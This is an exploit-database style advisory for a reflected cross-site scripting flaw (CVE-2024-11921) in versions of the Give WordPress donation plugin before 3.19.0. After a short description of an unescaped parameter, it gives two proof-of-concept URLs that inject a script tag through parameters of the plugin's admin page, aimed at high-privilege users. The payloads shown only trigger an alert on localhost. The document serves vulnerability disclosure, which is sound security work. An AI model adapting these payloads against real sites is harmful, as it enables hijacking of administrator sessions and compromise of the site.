# Exploit Title: Give < 3.19.0 - Reflected XSS
# Date: 2024-12-06
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wpscan.com/plugin/give/
# Version: give < 3.19.0
# Tested on: Firefox
# Contact me: hassankhan14044@outlook.com
# WPScan Disclosure:
https://wpscan.com/vulnerability/5f196294-5ba9-45b6-a27c-ab1702cc001f/
# Packet Strom Author: https://packetstorm.news/files/author/16236#
Exploit-DB Author: https://www.exploit-db.com/?author=11606
# CVE-2024-11921
 The plugin does not sanitise and escape a parameter before outputting
it back in the page, leading to a Reflected Cross-Site Scripting which
could be used against high privilege users such as admin.

# POC
http://localhost/wp-admin/admin.php?page=give-forms&give-run-migration=1"><script>alert(1)<%2Fscript>

http://localhost/wp-admin/admin.php?page=give-forms&give-clear-update=1"><script>alert(1)</script>